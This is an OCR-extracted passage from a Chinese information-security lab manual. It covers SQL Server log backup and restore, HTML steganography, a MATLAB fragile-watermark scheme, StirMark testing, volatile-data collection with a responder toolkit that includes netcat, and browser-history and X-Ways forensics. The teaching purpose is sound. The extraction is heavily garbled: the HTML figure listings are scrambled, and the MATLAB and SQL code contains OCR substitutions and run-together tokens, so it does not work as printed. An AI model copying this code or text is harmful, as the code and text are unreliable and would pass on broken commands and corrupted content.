le任務(wù)2【備份日志尾部】步驟1：在數(shù)據(jù)庫屬性頁中選擇“常規(guī)”一“事務(wù)日志”選項(xiàng)，在“選項(xiàng)”選項(xiàng)卡中勾選“備份日志尾部”復(fù)選框，并且保證數(shù)據(jù)庫沒有其他連接，因?yàn)閭浞萑罩疚膊繒?huì)使數(shù)據(jù)庫處于還原狀態(tài)，并拒絕其他會(huì)話的連接，如果不斷開其他連接，則將無法備份。也可以使用如下腳本完成。USEMasterGOBACKUPLOG[AdventureWorks］TODISK=N'E:\AdventureWorks.bak'WITHNO_TRUNCATE，NOFORMAT，NOINIT，NAME=N'AdventureWorks-事務(wù)日志備份'，SKIP,NOREWIND,NOUNLOAD,NORECOVERY,COMPRESSION,STATS=1O,CHECKSUMGOdeclare@backupsetIdasintselect@backupSetId=positionfrommsdb..backupsetwheredatabase_name:N'AdventureWorks'andbackup_set_id=(selectmax(backup_set_id)frommsdb.:backupsetwheredatabase_name=N'AdventureWorks')if@backupSetIdisnullbeginraiserror(N'驗(yàn)證失敗。找不到數(shù)據(jù)庫“AdventureWorks’的備份信息。'，16,1）endRESTOREVERIFYONLYFROMDISK=N'E:\AdventureWorks.bak'WITH@backupSetId,NOUNLOAD,NOREWINDGOFILE步驟2：此時(shí)數(shù)據(jù)庫會(huì)處于還原狀態(tài)，如果發(fā)現(xiàn)無法備份，則可以使用如下語句查詢。SELEcT*FROMsys.sysprocessesWHEREdbid=DB_ID('AdventureWorks')步驟3：如果都有spid，則可以用刪除操作將spid刪除。步驟4：繼續(xù)備份。步驟5：進(jìn)行還原，需要先還原完整備份，并選擇最新的一次，這是因?yàn)槿罩緜浞莸奶匦?，只能識(shí)別最后一次備份，所以需要選擇最新的那次，否則還原不了。特別注意：在“選項(xiàng)”選項(xiàng)卡中勾選“不對數(shù)據(jù)庫執(zhí)行任何操作，不回滾未提交的事務(wù)?？梢赃€原其他事務(wù)日志”復(fù)選框。步驟6：還原日志文件（選擇“任務(wù)”一→“還原”一→“事務(wù)日志”選項(xiàng)）。在時(shí)間點(diǎn)處選擇剛剛的時(shí)間節(jié)點(diǎn)17:45之前的某一個(gè)時(shí)間節(jié)點(diǎn)，如17:44，將時(shí)間點(diǎn)指定到發(fā)生誤刪除的時(shí)間之前即可。步驟7：在“選項(xiàng)”選項(xiàng)卡中勾選“回滾未提交的事務(wù)，使數(shù)據(jù)庫處于可以使用的狀態(tài)。無法還原其他事務(wù)日志”復(fù)選框。步驟8：檢查testTable表，即可發(fā)現(xiàn)數(shù)據(jù)已經(jīng)被還原成功。1·實(shí)訓(xùn)目的【實(shí)訓(xùn)I10】HTML信息隱藏（1）了解格式化文件信息隱藏的特點(diǎn)。（2）掌握如何利用HTML語言的特征隱藏秘密信息。（3）實(shí)現(xiàn)基于HTML語言的信息隱藏。（4）根據(jù)HTML語言特點(diǎn)設(shè)計(jì)其他的信息隱藏方法，并實(shí)現(xiàn)該方法。實(shí)驗(yàn)平臺(tái)環(huán)境鏈接：/shixuns/n2p4fvox/challenges2·實(shí)訓(xùn)任務(wù)在HTML中進(jìn)行信息隱藏的常見方法如下所述。（1）在網(wǎng)頁結(jié)束標(biāo)記</html>后或者在每一行的行尾插入空格或Tab鍵隱藏信息，插入一個(gè)空格代表0，插入一個(gè)Tab鍵代表1。（2）修改標(biāo)記屬性名稱的字母大小寫以隱藏信息，這是因?yàn)闃?biāo)記屬性名稱對大小寫不敏感。如標(biāo)記屬性名稱的字母全部大寫代表1，字母全部小寫代表0。這樣，一個(gè)標(biāo)記屬性名稱可以隱藏1bit信息。（3）修改屬性值字符串的字母大小寫以隱藏信息，這是因?yàn)閷傩灾底址畬Υ笮懖幻舾小Ｈ鐚傩灾底址淖帜复髮懘?，字母小寫代表0。（4）將屬性值外面的雙引號(hào)“”用單引號(hào)“替換以隱藏信息，這是因?yàn)閷傩灾涤秒p引號(hào)引起來和用單引號(hào)引起來是等價(jià)的。如用雙引號(hào)引起來代表1，用單引號(hào)引起來代表0。（5）某空元素標(biāo)記有兩種等價(jià)格式，如標(biāo)記<BR>可以被寫為<BR/>。我們可以用一種格式代表1，用另一種格式代表0。這樣的標(biāo)記還有<HR>=<HR/>，<IMG>=<IMG/>等。這樣的標(biāo)記可以隱藏1bit信息。任務(wù)1【HTML信息隱藏】步驟1：選擇載體HTML文件，打開網(wǎng)址/csweb/introduce/xxaqcenter.html，復(fù)制其源代碼并用UltraEdit打開，如圖3-6所示。1215Sheads<metahtontent-Type<title>歡迎訪間x國</title>content="text/html;charset=gb2312/>linkhref=n../stvle.ossnrei=nstvlesheetntmna=ntext/ossn/:<linkhre</nead>chndu<divid=ifra<hlclasss</div/App_Thenes/blueptintscreen.css"rel:titlee_title">x國簡介</h1>Kdivi<p>話說在很遠(yuǎn)的地方有一個(gè)國家astylesheet="text/css"/>tme國象覆贏素贏腹國庫物資、先進(jìn)的貨市體素、完善的醫(yī)療資源，但是信息化水平跟不上">（x國）國最初設(shè)有相關(guān)的機(jī)構(gòu)，每次國王想要了解各個(gè)機(jī)構(gòu)的相關(guān)情況，都需要派遣最信任想要了解國庫中的金銀珠寶、糧食等物資的庫存情況，A。查A檢查后回來匯報(bào)給國主：臣A去檢查，國主想要了解銀行中的貨市借過了幾寶關(guān)臣A檢查后尚來匯報(bào)給國主：段時(shí)間，國王情況：上大臣A香要了解醫(yī)院的收支情況與醫(yī)療永平，再次讓大臣A去檢查，大臣A檢查后回來匯報(bào)給國主1110.5h1117就這樣，每次國王想要了解各個(gè)機(jī)構(gòu)的相關(guān)情況時(shí)，都需要派大臣A去檢查，這樣既不方便，也使得失臣A很辛苦。</D>國于為了體恤大臣A（當(dāng)然還有一個(gè)原因，大臣A的權(quán)力過大對國于來說是一種威脅）行負(fù)責(zé)管理客個(gè)機(jī)構(gòu)的信息花管理部門，并直不同的信息化也為了管理方值譽(yù)理部高雷朵裔的關(guān)苣負(fù)責(zé)管理，例如，大宦B負(fù)費(fèi)菌庫素統(tǒng)，失臣c負(fù)責(zé)銀行素統(tǒng)，笑臣D負(fù)責(zé)醫(yī)院系統(tǒng)只要國主想要了解各個(gè)機(jī)構(gòu)的情況，就可以直接問話對應(yīng)的負(fù)責(zé)管理大臣B/文℃/B，他只需要按照職責(zé)要錄進(jìn)行匯報(bào)即奇。</D><p> /</p><div></div>Thr></div></body>htmly圖3-6選擇載體HTML文件并打開步驟2：輸入待隱藏信息。在上述的HTML文件中隱藏ILOVEYOU，將ILOVEYOU轉(zhuǎn)換成ASCI碼二進(jìn)制形式為：0100100101010101。01001100010011110101011001000101步驟3：選擇隱藏方法。0101100101001111（1）在標(biāo)記中的屬性賦值號(hào)"=”左右添加空格以隱藏信息。如果以左右均無空格表示00，左無右有空格表示01，左有右無空格表示10，左右均有空格表示11，則一個(gè)屬性賦值可以隱藏2bit信息。（2）標(biāo)記名稱（除<p>和</p>外）的字母全部大寫代表1，字母全部小寫代表0。這樣一個(gè)標(biāo)記名稱可以隱藏1bit信息。（3）屬性字母的大寫代表1，小寫代表0。這樣一個(gè)屬性名稱可以隱藏1bit信息。（4）在網(wǎng)頁結(jié)束標(biāo)記</html>后或者在每一行的行尾插入空格或Tab鍵隱藏信息，插入個(gè)空格代表0，插入一個(gè)Tab鍵代表1。步驟4：隱藏效果。（1）修改HTML文本內(nèi)容，如圖3-7所示。1013141518203222824<HEAD><metahttp-eequiv="ContentType"<title>歡迎訪問x國</title>contert="text/html;CHARSET=gb2312"/><linkhref="../style.css"rel="stylesheet"TYPE="text/css"/><LINKHREF="../AppThenes/blueptintscreen.css"rel="stylesheet"TYPE</HEAD><body><divID="iframe_page_title"<hiCLASs-"page_title">X國簡介</h1></DIV><divID="iframe_page_content"><p>話說在很遠(yuǎn)的地方有一個(gè)國家<aname="test">（X國）</A>Iassn該國有韋富的國庫物資、先進(jìn)的貨幣體系、完善的醫(yī)療資源，但是信息化水平跟不上國家證X國最初設(shè)有相關(guān)的機(jī)構(gòu)，每次國王想要了解各個(gè)機(jī)構(gòu)的相關(guān)情況，都需要派遣最信任要了解國庫中的金銀珠寶、糧食等物資的庫存情況，就讓大查A檢查后回來匯報(bào)給國主；過了幾關(guān)，國主想要了解銀行中的貨市借臣A去檢查文讓大臣A去檢查，天臣A檢查后來匯報(bào)給國主；支過了貸情況，一段時(shí)間，國全支想要了解醫(yī)院的收支情況與醫(yī)療水平，再次讓失臣A去檢查，大臣A檢查后回來匯報(bào)給國呈shellip:&hellip就這樣，每次國王想要了解各個(gè)機(jī)構(gòu)的相關(guān)情況時(shí)，都需要派大臣A去檢查，這樣既不方便，也使得關(guān)臣A很辛害。</P<p>國王為了體恤大臣A（當(dāng)然還有，大臣A的權(quán)力過大對國王來說是一種威脅）個(gè)原因，負(fù)責(zé)管理各個(gè)機(jī)構(gòu)的信息化管理部門，并直不同的信息化譽(yù)理部高雷朵的獎(jiǎng)苣負(fù)責(zé)管理，例菇，大暨B負(fù)責(zé)菌庫素統(tǒng)，臣c負(fù)責(zé)銀行系統(tǒng)，失臣D負(fù)責(zé)醫(yī)院系統(tǒng)Pi&he7i要國王想要了解各個(gè)機(jī)構(gòu)的情況，就可以直接間話對應(yīng)的負(fù)責(zé)管理大臣B/這祥c/D，他衍只需要按照職責(zé)要錄進(jìn)行匯報(bào)即岢。<p> /</p>div></DIV><hr></div></BODY></HTML>圖3-7修改HTML文本內(nèi)容（2）瀏覽隱寫前與隱寫后的頁面效果，如圖3-8所示。從圖3-8可以看出，這兩種頁面效果在視覺上沒有任何差別，但實(shí)際上已經(jīng)隱藏了秘密信息。在本實(shí)訓(xùn)中，通過設(shè)計(jì)的信息隱藏方法，成功地將ILOVEYOU隱寫在選擇的HTML文件中，并且最終的頁面瀏覽效果與之前沒有什么不同。X國簡介話說在很遠(yuǎn)的地方有一個(gè)國家（X國），該國有豐富的國庫物資、先進(jìn)的貨幣體系、完善的醫(yī)療資源，但是信息化水平跟不上國家發(fā)展的速度。X國最初設(shè)有相關(guān)的機(jī)構(gòu)，每次國王想要了解各個(gè)機(jī)構(gòu)的相關(guān)情況，都需要派遣最信任的大臣A去檢查。某天，國王想要了解國庫中的金銀珠寶、糧食等物資的庫存情況，就讓大臣A去檢查，大臣A檢查后回來匯報(bào)給國王；過了幾天，國王想要了解銀行中的貨幣借貸情況，又讓大臣A去檢查，大臣A檢查后回來匯報(bào)給國王；又過了一段時(shí)間，國王又想要了解醫(yī)院的收支情況與醫(yī)療水平，再次讓大臣A去檢查，大臣A檢查后回來匯報(bào)給國王。這樣，每次國王想要了解各個(gè)機(jī)構(gòu)的相關(guān)情況時(shí)，都需要派大臣A去檢查，這樣既不方便，也使得大臣A很辛苦。國王為了體恤大臣A（當(dāng)然還有一個(gè)原因，大臣A的權(quán)力過大對國王來說是一種威脅），也為了管理方便，設(shè)立了專門負(fù)責(zé)管理各個(gè)機(jī)構(gòu)的信息化管理部門，并且不同的信息化管理部門由不同的大臣負(fù)責(zé)管理，例如，大臣B負(fù)責(zé)國庫系統(tǒng)，大臣C負(fù)責(zé)銀行系統(tǒng)，大臣D負(fù)責(zé)醫(yī)院系統(tǒng)。這樣一來，只要國王想要了解各個(gè)機(jī)構(gòu)的情況，就可以直接問話對應(yīng)的負(fù)責(zé)管理大臣B/C/D，他們只需要按照職責(zé)要求進(jìn)行匯報(bào)即可。x國簡介話說在很遠(yuǎn)的地方有一個(gè)國家（X國），該國有豐富的國庫物資、先進(jìn)的貨幣體系、完善的醫(yī)療資源，但是信息化水平跟不上國家發(fā)展的速度。X國最初設(shè)有相關(guān)的機(jī)構(gòu)，每次國王想要了解各個(gè)機(jī)構(gòu)的相關(guān)情況，都需要派遣最信任的大臣A去檢查。某天，國王想要了解國庫中的金銀珠寶、糧食等物資的庫存情況，就讓大臣A去檢查，大臣A檢查后回來匯報(bào)給國王；過了幾天，國王想要了解銀行中的貨幣借貸情況，又讓大臣A去檢查，大臣A檢查后回來匯報(bào)給國王；又過了一段時(shí)間，國王又想要了解醫(yī)院的收支情況與醫(yī)療水平，再次讓大臣A去檢查，大臣A檢查后回來匯報(bào)給國王。這樣，每次國王想要了解各個(gè)機(jī)構(gòu)的相關(guān)情況時(shí)，都需要派大臣A去檢查，這樣既不方便，也使得大臣A很辛苦。國王為了體恤大臣A（當(dāng)然還有一個(gè)原因，大臣A的權(quán)力過大對國王來說是一種威脅），也為了管理方便，設(shè)立了專門負(fù)責(zé)管理各個(gè)機(jī)構(gòu)的信息化管理部門，并且不同的信息化管理部門由不同的大臣負(fù)責(zé)管理，例如，大臣B負(fù)責(zé)國庫系統(tǒng)，大臣C負(fù)責(zé)銀行系統(tǒng)，大臣D負(fù)責(zé)醫(yī)院系統(tǒng)。這樣一來，只要國王想要了解各個(gè)機(jī)構(gòu)的情況，就可以直接問話對應(yīng)的負(fù)責(zé)管理大臣B/C/D，他們只需要按照職責(zé)要求進(jìn)行匯報(bào)即可。圖3-8瀏覽隱寫前與隱寫后的頁面效果1·實(shí)訓(xùn)目的實(shí)訓(xùn)11）圖片隱寫-完全脆弱水?。?）了解脆弱水印和半脆弱水印的原理。（2）設(shè)計(jì)并實(shí)現(xiàn)一種完全脆弱水印算法。2·實(shí)訓(xùn)任務(wù)【實(shí)訓(xùn)環(huán)境說明】MATLAB軟件。實(shí)驗(yàn)平臺(tái)環(huán)境鏈接：/shixuns/os69actm/challenges【實(shí)訓(xùn)方法】（1）嵌入信息。校驗(yàn)和算法首先計(jì)算每個(gè)像素字節(jié)最高7位的Checksum值，Checksum值的定義為系列相同長度數(shù)據(jù)的二進(jìn)制位的模2和。在該算法中，此長度為8個(gè)連續(xù)像素中的最高7位的聯(lián)合長度，共56位。在Checksum值的計(jì)算過程中，整張圖像中的每個(gè)像素都參與計(jì)算，但每個(gè)像素只計(jì)算一次，最后結(jié)果為56位的數(shù)據(jù)。該算法隨后在圖像中隨機(jī)選取56個(gè)像素，將每個(gè)像素的最低位變?yōu)榕c上述Checksum值的比特位相同，以存儲(chǔ)Checksum值，從而完成水印的嵌入。（2）提取信息。在提取水印時(shí)，只需計(jì)算圖像的Checksum值并與水印信息中的Checksum值進(jìn)行比較，即可得知水印是否因遭受篡改而被損壞?！緦?shí)訓(xùn)效果】（1）原始圖像和添加水印信息的圖像的對比，如圖3-9所示。結(jié)果：兩者在顯示上基本沒有差別。（2）檢查圖像是否被修改，并提取秘密信息，如圖3-10所示。結(jié)果：diff數(shù)組值全為0，表示圖像未被修改。原始圖像添加水印信息的圖像圖3-9原始圖像和添加水印信息的圖像的對比108004490500任務(wù)1【圖片隱寫】51步驟1：嵌入秘密信息。參考代碼clcclear;oi=imread('lena.bmp');[orow,ocol]=size(oi;pixelcount=orow*ocol;count=floor(pixelcount/8);wi=oi(:);fori=l:countforj=1:56l(i,j)=uint8(0);endendk=1;i=1;fori=l:countwherestart=8*(i-1);forj=l:8b(i,j)=wi(wherestart+j);endend5253圖3-10提取秘密信息%計(jì)算總像素個(gè)數(shù)%將總像素分為8個(gè)一組%用于存放56bit%把每個(gè)像素值的最高7位取出，順序?yàn)?、3、4、5、6、7、8modcount=1;fori=l:countforj=1:8fork=1:71(i,7*(j-1)+k)=bitget(b(i,j),k+1);modcount=modcount+1;endendend%把所有的56位的值按照模2加得到一個(gè)56位長度的Checksum值z=sum(1,1):fori=l:56z(1,i)=mod(z(1,i),2)end%從圖像中隨機(jī)選取56個(gè)像素點(diǎn)key=123;z=uint8(z);%用戶選取隨機(jī)嵌入的位置[row,col]=randselect(oi,56,key);fork=1:56temp(k)=oi(row(k),col(k));templ=str2bit(temp(k))54055056templ(8)=z(k);oi(row(k),col(k))=bit2str(templ)endimwrite(oi,'watermarked.bmp','bmp');figure;subplot（1,2,1）；imshow('lena.bmp'）;title（'原始圖像）；subplot（1，2,2）；imshow（"watermarked.bmp'）;title（"添加水印信息的圖像'）步驟2：提取秘密信息。參考代碼clc;clear;oi=imread('watermarked.bmp');[orowocol]=size(oi);pixelcount=orow*ocol;%計(jì)算總像素個(gè)數(shù)count=floor(pixelcount/8);wi=oi(:);fori=l:countforj=1:56l(i,j)=uint8(0);endendk=1;i=1;fori=l:countwherestart=8*(i-1);forj=l:8b(i,j)=wi(wherestart+j);endend器用于存放56bit%把每個(gè)像素值的最高7位取出，順序?yàn)?，3，4，5，6，7，8modcount=l;fori=l:countforj=l:8fork=1:71(i,7*(j-1)+k)=bitget(b(i,j),k+l)modcount=modcount+1;endendend%把所有的56位的值按照模2加得到一個(gè)56位長度的checksum值z=sum(1,1)fori=1:56z(1,i)=mod(z(1,i),2);end%從圖像中選取56個(gè)像素值key=123;fork=l:56watermark(1,k)=0;%用戶選取隨機(jī)嵌入的位置end[rowcol]=randselect(oi,56,key);fork=l:56watermark(l,k)=bitget(oi(row(k),col(k)),1);endfork=1:56diff(1,k)=z(1,k)-watermark(1,k);endfork=1:56ifdiff(1,k)~=0modified=l;elsemodified=o;endend1·實(shí)訓(xùn)目的【實(shí)訓(xùn)12】檢測水印算法魯棒性（1）了解如何檢測水印算法魯棒性。（2）設(shè)計(jì)并實(shí)現(xiàn)一種完全脆弱水印算法。2·實(shí)訓(xùn)任務(wù)【實(shí)訓(xùn)環(huán)境說明】MATLAB軟件。實(shí)驗(yàn)平臺(tái)環(huán)境鏈接：/shixuns/lvi7mfka/challenges任務(wù)【檢測水印算法魯棒性】StirMark是一個(gè)檢測水印算法魯棒性的攻擊工具。方法：給定嵌入水印的圖像，通過StirMark生成一定數(shù)量的修改圖像，這些被修改的圖像被用來驗(yàn)證水印是否能被檢測出來。攻擊手段包括線性濾波、非線性濾波、剪切/拼接攻擊、同步性破壞攻擊等，步驟1：打開Media文件夾，其中有兩個(gè)子文件夾Input和Output。將待檢測的圖像放入IMedia\Input\ImagesISetl文件夾中。步驟2：雙擊Bin\Benchmark文件夾中的StirMarkBenchmark.exe（StirMark主程序）StirMark程序會(huì)自動(dòng)運(yùn)行，將待檢測圖像的各種檢測結(jié)果圖像放入IMediaVInput\Images\Setl文件夾中。步驟3：運(yùn)行完成后，Bin\Benchmark文件夾下生成的log日志文件中會(huì)記錄詳細(xì)的攻擊策略信息，并計(jì)算攻擊后的誤碼率。1·實(shí)訓(xùn)目的【實(shí)訓(xùn)13】易失性數(shù)據(jù)收集（1）了解易失性數(shù)據(jù)收集方法。（2）能夠?qū)ν话l(fā)事件進(jìn)行初步調(diào)查，做出適當(dāng)?shù)捻憫?yīng)。（3）能夠在最低限度地改變系統(tǒng)狀態(tài)的情況下收集易失性數(shù)據(jù)。2·實(shí)訓(xùn)任務(wù)【實(shí)訓(xùn)環(huán)境說明】一個(gè)U盤（或其他移動(dòng)介質(zhì)）和PsTools工具包。實(shí)驗(yàn)平臺(tái)環(huán)境鏈接：/shixuns/ufwxkhe7/challenges任務(wù)1【易失性數(shù)據(jù)收集】步驟1：將常用的響應(yīng)工具存入U(xiǎn)盤，創(chuàng)建應(yīng)急工具盤。應(yīng)急工具盤中的常用工具有cmd.exe、netstat.exe、fport.exe、nslookup.exe、nbtstat.exe、arp.exe、md5sum.exe、netcat.exe、cryptcat.exe、ipconfig.exe、time.exe、date.exe等。步驟2：用cmd命令進(jìn)入工具安裝的目錄。用命令md5sum創(chuàng)建工具盤上所有命令的校驗(yàn)和，生成文本文件commandsums.txt并保存到工具盤上，然后將工具盤寫保護(hù)，避免計(jì)算機(jī)木馬程序更改軟件，與最后的校驗(yàn)形成對比。命令如下：md5sum.exe*>commandsums_first.txt步驟3：用time和date命令記錄現(xiàn)場計(jì)算機(jī)的系統(tǒng)時(shí)間和日期。步驟4：用dir命令列出現(xiàn)場計(jì)算機(jī)系統(tǒng)上所有文件的目錄清單，記錄文件的大小、訪問時(shí)間、修改時(shí)間和創(chuàng)建時(shí)間。步驟5：用ipconfig命令獲取現(xiàn)場計(jì)算機(jī)的IP地址、子網(wǎng)掩碼、默認(rèn)網(wǎng)關(guān)，用ipconfig/all命令獲取更多有用的信息，如主機(jī)名、DNS服務(wù)器、節(jié)點(diǎn)類型、網(wǎng)絡(luò)適配器的物理地址等。步驟6：用netstat命令顯示現(xiàn)場計(jì)算機(jī)的網(wǎng)絡(luò)連接、路由表和網(wǎng)絡(luò)接口信息，檢查哪些監(jiān)聽端口是打開的，以及檢查與這些監(jiān)聽端口的所有連接。步驟7：用PsTools工具包中的PsLoggedOn命令查看當(dāng)前哪些用戶與系統(tǒng)保持著連接狀態(tài)。步驟8：用PsTools工具包中的PsList命令記錄當(dāng)前所有正在運(yùn)行的進(jìn)程和當(dāng)前的連接。步驟9：再運(yùn)行一次time和date命令。步驟10：運(yùn)行md5sum.exe*>commandsums_last.txt命令，使校驗(yàn)碼保存為文本文檔。查看保存在取證工具根目錄下的兩次校驗(yàn)文檔。任務(wù)2【思考】（1）為什么每次取證完成后，必須記錄當(dāng)下時(shí)間和日期？（2）為什么在實(shí)訓(xùn)開始和結(jié)尾必須把校驗(yàn)碼保存為文本文檔（如commandsumsfirst.txt和commandsums_last.txt文本文檔）？（3）針對本次實(shí)訓(xùn)數(shù)據(jù)，可以分析出什么結(jié)果？1·實(shí)訓(xùn)自的【實(shí)訓(xùn)14】瀏覽器歷史記錄數(shù)據(jù)恢復(fù)提取方法（1）了解電子取證方法。（2）能夠?qū)?60瀏覽器歷史記錄文件進(jìn)行快速解析和提取。2·實(shí)訓(xùn)任務(wù)【實(shí)訓(xùn)環(huán)境說明】效率源手機(jī)數(shù)據(jù)恢復(fù)工具。實(shí)驗(yàn)平臺(tái)環(huán)境鏈接：/shixuns/izksyteu/challenges任務(wù)【360瀏覽器歷史記錄提取】案例描述：近年來，利用計(jì)算機(jī)進(jìn)行網(wǎng)絡(luò)犯罪的行為呈高增長態(tài)勢，瀏覽器歷史痕跡成為計(jì)算機(jī)取證的重點(diǎn)。由于某些瀏覽器記錄保存方法有其自已特定的格式，市面上很少有針對這種記錄文件進(jìn)行解析的工具或方法，因此這種瀏覽器歷史痕跡被刪除后，如果沒有解析方法，其提取環(huán)節(jié)就會(huì)陷入僵局。目前，市面上的主要瀏覽器有微軟IE、谷歌Chrome、奇虎360瀏覽器、搜狗瀏覽器、百度瀏覽器。其中，360瀏覽器作為主流瀏覽器之一，占有較高的市場份額，而它的瀏覽器記錄保存方法就屬于特定格式。因此，研究360瀏覽器的歷史痕跡提取方法并形成有效的電子證據(jù)，對計(jì)算機(jī)取證具有重要意義。實(shí)訓(xùn)步驟：步驟1：確定360瀏覽器歷史痕跡文件所在的存儲(chǔ)位置。360瀏覽器歷史痕跡文件在不同操作系統(tǒng)中的存儲(chǔ)位置不一樣，可根據(jù)當(dāng)前操作系統(tǒng)查找對應(yīng)的存儲(chǔ)位置。例如，360瀏覽器歷史痕跡文件在Windows7/8操作系統(tǒng)的下路徑為C:\Users\用戶名VAppData\Roaming/360se6\UserDatalDefault/History。步驟2：分清360瀏覽器歷史痕跡文件的類型。360瀏覽器在不同操作系統(tǒng)中的記錄歷史痕跡文件的類型不同。研究發(fā)現(xiàn)，360瀏覽器歷史痕跡文件主要有兩種類型：一種是XP操作系統(tǒng)下的二進(jìn)制dat文件類型；另一種是Windows7/8操作系統(tǒng)下的SQLite3數(shù)據(jù)庫類型。本次實(shí)訓(xùn)以Windows7/8操作系統(tǒng)為例。步驟3：解析360瀏覽器歷史痕跡文件（解析SQLite3數(shù)據(jù)庫）。SQLite3是一種輕型數(shù)據(jù)庫，目前有多種成熟的解析與提取方法，有很多軟件可以支持該數(shù)據(jù)庫的提取，如SQLiteExpert、效率源手機(jī)數(shù)據(jù)恢復(fù)工具。針對刪除的歷史痕跡文件，可以使用效率源手機(jī)數(shù)據(jù)恢復(fù)工具中的特征庫方式進(jìn)行全盤檢索恢復(fù)。所謂的特征庫方式，就是按照現(xiàn)有數(shù)據(jù)排列格式在空閑區(qū)域中進(jìn)行篩查，判斷是否存在這種規(guī)律的數(shù)據(jù)，若存在則表示該文件是刪除的歷史痕跡文件。以效率源手機(jī)數(shù)據(jù)恢復(fù)工具為例，在檢索結(jié)果中顯示為綠色的部分為正常數(shù)據(jù)，顯示為紅色的部分為刪除的歷史痕跡文件。1·實(shí)訓(xùn)目的【實(shí)訓(xùn)15】X-waysForensics取證（1）能夠使用X-waysForensics軟件進(jìn)行簡單取證。(2）了解使用X-waysForensics軟件進(jìn)行取證分析的一般過程。（3）能夠使用X-waysForensics軟件調(diào)查案件、搜索和查找證據(jù)、生成報(bào)告。2·實(shí)訓(xùn)任務(wù)【實(shí)訓(xùn)環(huán)境說明】Windows操作系統(tǒng)、X-waysForensics軟件。實(shí)驗(yàn)平臺(tái)環(huán)境鏈接：/shixuns/zrfpc9ne/challenges任務(wù)【X-waysForensics取證】步驟1：創(chuàng)建案件。連接好硬件介質(zhì)后，打開X-waysForensics軟件。當(dāng)需要?jiǎng)?chuàng)建案件時(shí)，選擇一個(gè)文件，新建一個(gè)案件。接下來，在“屬性”對話框中填寫案件信息，可以輸入“案件名稱/編號(hào)案件描述"調(diào)查員、機(jī)構(gòu)、地址信息”等，其中，案件名稱需要使用英文或數(shù)字，否則在案件日志和報(bào)告中無法出現(xiàn)屏幕快照，如圖4-1所示。注意：為了保障數(shù)據(jù)分析中顯示的時(shí)間正確，需要在顯示時(shí)區(qū)中設(shè)置正確的時(shí)區(qū)信息。在創(chuàng)建案件后，需要添加分析的目標(biāo)?？梢蕴砑游锢泶鎯?chǔ)設(shè)備，如磁盤、光盤、USB存儲(chǔ)設(shè)備等，也可以添加EO1鏡像、DD磁盤鏡像，以及X-ways自有的證據(jù)文件格式下面以添加鏡像文件為例，如圖4-2所示。屬性案件名稱/編號(hào)案件保存目C:Wserslchen案件描述(D:口自動(dòng)記錄所有操作L)日志中包含屏葬快照日志：0B報(bào)告）.國自動(dòng)保存周期份鐘）案例備份文件編號(hào)RVS:P確定()顯示時(shí)區(qū)5取消()）創(chuàng)建時(shí)間：2019/10/16調(diào)查員、機(jī)構(gòu)、地址信息區(qū)：Eeaeadyihle刪除(D)msglog.txt.口為每個(gè)證據(jù)項(xiàng)目自使用特定的時(shí)區(qū)自動(dòng)添加藏盤分區(qū)至案件口設(shè)置案件打開口令圖4-1填寫案件信息幫助(a)XX-WaysInvestigator-[分區(qū)1]文件(F)編輯(E)搜素(S)查看創(chuàng)建新案件打開案件關(guān)閉案件保存案件男存為(A).索件歸檔創(chuàng)建案件報(bào)告..打開報(bào)告(R).添加存儲(chǔ)設(shè)備.添加目錄添加鏡像文件退出(風(fēng)）Alt+F4圖4-2添加鏡像文件添加鏡像文件后，可以看到鏡像的基本信息，如分區(qū)、文件系統(tǒng)等，如圖4-3所示。編最E搜量MnBE0器服e，分區(qū)：分區(qū)間障OM文件預(yù)貨詳細(xì)縮陷圖圖例說明步A16：總計(jì)6個(gè)項(xiàng)目，0個(gè)被標(biāo)記0個(gè)跑含，0已經(jīng)查看的激據(jù)聚國醫(yī)字節(jié)139.944／公醫(yī)界理親品30:843:19188圖4-3添加鏡像文件后的界面可以查看各個(gè)分區(qū)的文件，如圖4-4所示。文件(D編綠（E）搜家（S）童香工具D專業(yè)工具）活項(xiàng)(）密口胎（H）第區(qū)Videosdwierdethiaartedhittheotoe.untortedsinBihasbeenlleestedto圖4-4查看各個(gè)分區(qū)的文件步驟2：X-waysForensics文件過濾。4文件，1分區(qū)總計(jì)選中：0文件（19.028女件。0個(gè)目錄總計(jì)選中：1文件(15.513）品在X-waysForensics軟件中，可以方便地對各種類型的數(shù)據(jù)文件進(jìn)行過濾操作。當(dāng)使用某過濾條件時(shí)，只需要單擊“文件名稱”左側(cè)的漏斗圖標(biāo)，輸入過濾條件，單擊“激活”按鈕即可顯示過濾結(jié)果。按文件名稱過濾支持多語種字符，如果需要取消某過濾條件，則單擊“禁用按鈕即可。下面簡單介紹幾種過濾方式。（1）按文件名稱過濾?？梢允褂猛ㄅ浞?，針對特定文件名稱進(jìn)行過濾。例如，搜索*doc、*hmm、*tmp等。在使用通配符時(shí)，不能同時(shí)出現(xiàn)兩個(gè)*。這種過濾方式適用于對文件名稱及單一文件類型進(jìn)行過濾，特點(diǎn)是速度快、準(zhǔn)確率高。例如，需要查找文件名稱包含unlink的文件，則可以在文件名中搜索關(guān)鍵詞unlink。按文件名稱過濾的操作和結(jié)果分別如圖4-5和圖4-6所示。過津：文件名稱O模據(jù)文件名匹配，允許使用通配符，如："p在文件名中攜索(S)LGREP語生unirk匹配大小寫M微活（c）禁用(2)幫助(g)圖4-5按文件名稱過濾的操作X-WaysInvestigator-[分區(qū)1]文件(F)編鵝(E)搜索(S)查看()工具(T)專業(yè)工具()選項(xiàng)(O)窗口(W)幫助(（H)寬件數(shù)據(jù)glibc2.26國libc-databaseDocuments(0Downloads(1)how2heap（35LibeSearcher(6)Music(申output（21國peda（47Ubuntu16Ubuntu16，分區(qū)1分區(qū)間隙Ubuntu16homeltoor/Desktoplhow2heaplglibe_2.26文件名稱一unsafe_nlinkunsafe_unlink.c文件類型文件大小創(chuàng)建時(shí)間修改時(shí)間訪問時(shí)間.2019/07/2121..2019/07/2121.15,2B2019/07/2121..4.8KB2019/07/2121..2019/03/2921..2019/07/2121.圖4-6按文件名稱過濾的結(jié)果（2）按文件類型過濾。按照設(shè)定的文件分類，對不同類型的文件進(jìn)行過濾。使用這種過濾方式可以很容易地將辦公文檔、圖形圖像、壓縮文件及各種重要數(shù)據(jù)（如注冊表文件、互聯(lián)網(wǎng)歷史記錄、回收站文件、打印池、Windows操作系統(tǒng)交換文件、日志等）快速過濾出來。使用方法：選擇相應(yīng)的文件類型，單擊“激活”按鈕。在過濾前，應(yīng)在磁盤快照中選擇依據(jù)文件簽名校驗(yàn)文件的真實(shí)類型，才能判斷出文件的真實(shí)類型，如圖4-7所示。（3）按文件大小過濾。根據(jù)文件的實(shí)際大小過濾，不包括殘留區(qū)數(s